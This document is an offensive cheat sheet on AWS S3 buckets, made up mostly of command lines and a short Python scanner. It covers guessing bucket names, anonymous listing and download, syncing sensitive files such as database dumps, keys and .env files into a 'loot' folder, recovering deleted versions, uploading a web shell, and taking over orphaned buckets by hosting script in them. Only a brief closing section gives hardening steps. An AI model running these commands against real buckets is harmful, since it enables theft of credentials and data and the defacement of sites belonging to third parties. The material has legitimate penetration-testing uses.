S3 Bucket Enumeration and Exploitation

# Common naming patterns
company-name
company-name-backup
company-name-dev
company-name-prod
company-name-staging
company-name-logs
company-name-assets
company-name-uploads
company-name-data
www.company.com
assets.company.com
backup.company.com

# Using S3Scanner
s3scanner --buckets wordlist.txt

# Using bucket-finder
bucket_finder.rb --wordlist wordlist.txt

# Using cloud_enum
cloud_enum -k company -l results.txt

# Using gobuster
gobuster s3 -w wordlist.txt

# Check CNAME records pointing to S3
dig +short assets.company.com
# s3.amazonaws.com or company.s3.amazonaws.com

# Certificate Transparency logs
# Search crt.sh for *.s3.amazonaws.com associations

# Google dorking
site:s3.amazonaws.com "company"
site:s3-*.amazonaws.com "company"

# Search repositories for bucket references
grep -r "s3.amazonaws.com" .
grep -r "s3://" .
grep -r "\.s3\." .

# Common files to check
.env
config.js
webpack.config.js
application.properties

# Check page source for S3 URLs
# Look in:
# - Image src attributes
# - JavaScript files
# - CSS background URLs
# - API responses

# Network tab for S3 requests
# Response headers may reveal bucket names

# List bucket contents (anonymous)
aws s3 ls s3://bucket-name --no-sign-request

# Download objects (anonymous)
aws s3 cp s3://bucket-name/file.txt . --no-sign-request

# Check if upload is allowed (anonymous)
echo "test" > test.txt
aws s3 cp test.txt s3://bucket-name/ --no-sign-request

# With AWS credentials (any valid AWS account)
aws s3 ls s3://bucket-name
aws s3 cp s3://bucket-name/secret.txt .
aws s3 sync s3://bucket-name ./local-backup

# Check bucket ACL
aws s3api get-bucket-acl --bucket bucket-name

# Check bucket policy
aws s3api get-bucket-policy --bucket bucket-name

# List with versions (if versioning enabled)
aws s3api list-object-versions --bucket bucket-name

# Get and analyze bucket policy
aws s3api get-bucket-policy --bucket bucket-name \
    --query Policy --output text | jq .

# Check for dangerous principals:
# - "*" (anyone)
# - "AWS": "*" (any AWS account)
# - Specific account IDs you shouldn't have access to

# Check for dangerous actions:
# - s3:* (full access)
# - s3:GetObject (read all)
# - s3:PutObject (write access)

# Sync entire bucket
aws s3 sync s3://bucket-name ./loot --no-sign-request

# Download specific file types
aws s3 cp s3://bucket-name/ ./loot \
    --recursive --exclude "*" \
    --include "*.sql" --include "*.bak" --include "*.csv" \
    --no-sign-request

# Search for sensitive files
aws s3 ls s3://bucket-name --recursive | \
    grep -iE '\.(sql|bak|csv|xls|doc|pdf|key|pem|env)$'

# Files to prioritize:
# - Database dumps (.sql, .bak)
# - Configuration files (.env, config.*)
# - Credentials (.pem, .key, credentials)
# - Backups (.zip, .tar.gz)
# - Logs (*.log, access_log)
# - Source code (.git, *.js, *.py)

# If PutObject is allowed
echo "<h1>Security Assessment</h1>" > index.html
aws s3 cp index.html s3://bucket-name/ --no-sign-request

# Upload web shell (for authorized testing only)
aws s3 cp shell.php s3://bucket-name/ --no-sign-request

# If bucket doesn't exist but is referenced
# (e.g., in CNAME record or application code)

# 1. Try to create the bucket
aws s3 mb s3://orphaned-bucket-name

# 2. Host malicious content
echo "<script>alert('subdomain takeover')</script>" > index.html
aws s3 cp index.html s3://orphaned-bucket-name/
aws s3 website s3://orphaned-bucket-name/ --index-document index.html

# Check if versioning is enabled
aws s3api get-bucket-versioning --bucket bucket-name

# List all versions (may reveal deleted sensitive files)
aws s3api list-object-versions --bucket bucket-name

# Download specific version
aws s3api get-object \
    --bucket bucket-name \
    --key sensitive-file.txt \
    --version-id "version-id-here" \
    ./downloaded-file.txt

# Iterate through deleted objects
aws s3api list-object-versions --bucket bucket-name \
    --query 'DeleteMarkers[].{Key:Key,VersionId:VersionId}'

# Enumerate and test buckets
pip install S3Scanner
s3scanner scan --bucket bucket-name
s3scanner dump --bucket bucket-name

# Dump accessible bucket contents
python AWSBucketDump.py -l buckets.txt -g interesting_Keywords.txt

# Ruby-based enumeration
./bucket_finder.rb --download bucket-name

import boto3
from botocore import UNSIGNED
from botocore.config import Config

# Anonymous client
s3 = boto3.client('s3', config=Config(signature_version=UNSIGNED))

# Test bucket access
def test_bucket(bucket_name):
    try:
        response = s3.list_objects_v2(Bucket=bucket_name, MaxKeys=10)
        print(f"[OPEN] {bucket_name}: {len(response.get('Contents', []))} objects")
        return True
    except Exception as e:
        return False

# Enumerate from wordlist
with open('buckets.txt') as f:
    for bucket in f:
        test_bucket(bucket.strip())

# Enable Block Public Access (account level)
aws s3control put-public-access-block \
    --account-id YOUR_ACCOUNT_ID \
    --public-access-block-configuration \
    "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

# Enable Block Public Access (bucket level)
aws s3api put-public-access-block \
    --bucket bucket-name \
    --public-access-block-configuration \
    "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "DenyPublicAccess",
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:*",
            "Resource": [
                "arn:aws:s3:::bucket-name",
                "arn:aws:s3:::bucket-name/*"
            ],
            "Condition": {
                "Bool": {
                    "aws:SecureTransport": "false"
                }
            }
        }
    ]
}

# Enable S3 access logging
# Enable CloudTrail for S3 data events
# Set up GuardDuty for anomaly detection
# Use AWS Config rules for compliance